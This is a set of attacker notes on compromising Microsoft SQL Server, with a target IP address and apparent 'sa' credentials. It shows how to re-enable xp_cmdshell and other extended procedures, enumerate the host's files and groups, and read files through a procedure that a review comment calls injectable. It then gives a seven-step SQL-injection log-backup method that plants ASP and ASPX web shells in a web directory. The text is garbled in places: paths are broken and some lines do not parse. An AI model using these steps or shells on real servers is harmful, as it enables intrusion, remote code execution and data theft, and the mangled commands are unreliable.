Objectives:
61.128.196.16
Sa
123321
Sp_addextendedproc xp_lake2, c: ecyclerxplake2.dll
Sp_addextendedproc xp_cmdshell, @ dllname = E: ewche2aboutXPLOG70. DLL
Exec sp_addextendedproc xp_cmdshell, xp_cmdshell.dll
Exec sp_addextendedproc xp_dirtree, xpstar. dll
Exec sp_addextendedproc sp_OACreate, odsole70.dll
Sp_dropextendedproc xp_lake2
-- Obtain the MS SQL version.
Execute master .. sp_msgetversion
-- Obtain the hard disk file information.
-- Parameter description: directory name, directory depth, and whether to display files
Execute master .. xp_dirtree c:
Execute master .. xp_dirtree c:, 1
Execute master .. xp_dirtree c:, 1, 1
-- Check file existence
Execute master .. xp_fileexist c: a. bak
-- List all windows Local Groups on the server
Execute master .. xp_enumgroups
-- Obtain the computer name of the current SQL server.
Execute master .. xp_getnetname
Exec sp_readTextFile c: aaa. asp
-- sp_readTextFile: returns the contents of the file named by @filename as a
-- result set, one row per line, by BULK INSERTing the file into a temp table.
--   @filename  path of the file to read (sysname); it is used verbatim, with no
--              validation, inside dynamic SQL (see the Exec line below).
-- Returns: rows of one column, line varchar(8000).
-- NOTE(review): the statement is built by string concatenation of @filename and
-- run through Exec, so the parameter is part of the SQL text rather than a bound
-- value — any caller allowed to EXECUTE this proc can alter the statement and
-- read whatever file the server's BULK INSERT is permitted to open. Treat
-- EXECUTE on this proc as a sensitive grant and audit its use; presumably the
-- surrounding quotes were lost in extraction (the line as shown does not parse).
Create proc sp_readTextFile @ filename sysname
As
Begin
-- suppress "N rows affected" messages so only the file rows are returned
Set nocount on
-- staging table for the file; each input line lands in one varchar(8000) row
Create table # tempfile (line varchar (8000 ))
-- dynamic SQL: @filename is concatenated directly into the BULK INSERT text
Exec (bulk insert # tempfile from "+ @ filename + ")
-- return the lines (a named column list would be clearer than *)
Select * from # tempfile
Drop table # tempfile
End
Go
Execute master .. xp_dirtree c:, 1, 1
D: electronic warehouse \ ckgl
Cqmcck1
Alter database cqmcck1 set RECOVERY FULL
Create table cmd (a image )--
Backup log cqmcck1 to disk = c: cmd with init
Insert into cmd (a) values (<% eval (request ("a"): response. end %> )--
Backup log cqmcck1 to disk = d: electronic warehouse \ ckgli3.asp --
Drop table cmd --
<% Eval (request ("a"): response. end %> dedicated sentence for backup
Adding response. end will have a different effect, that is, all the code after a sentence is inserted is invalid. In a single sentence, it will reduce the webshell size.
Log backup is divided into seven steps of the WEBSHELL standard:
1. InjectionURL; alter database XXX set recovery full -- (set SQL to log FULL RECOVERY mode)
2. InjectionURL; create table cmd (a image) -- (create a new cmd table)
3. InjectionURL; backup log XXX to disk = c: cmd with init -- (reduce the size of the backup data)
4. InjectionURL; insert into cmd (a) values (<% 25 eval (request ("a"): response. end % 25>) -- (insert a sentence Trojan)
5. InjectionURL; backup log XXX to disk = d: chinakmest. asp -- (backup log to WEB path)
6. InjectionURL; drop table cmd -- (delete the new cmd table)
7. InjectionURL; alter database XXX set recovery simple -- (set SQL to SIMPLE log RECOVERY mode)
Alter database cqmcck1 set RECOVERY FULL
Create table cqmcck1.dbo. cmd (a image)
Backup log cqmcck1 to disk = c: TM with init
Insert into cqmcck1.dbo. cmd (a) values (<% @ Page Language = "C #" validateRequest = "false" %> <% System. IO. streamWriter ow = new System. IO. streamWriter (Server. mapPath ("I. aspx "), false); ow. write (Request. params ["m"]); ow. close () %>)
Backup log cqmcck1 to disk = d: electronic warehouse \ ckglim. aspx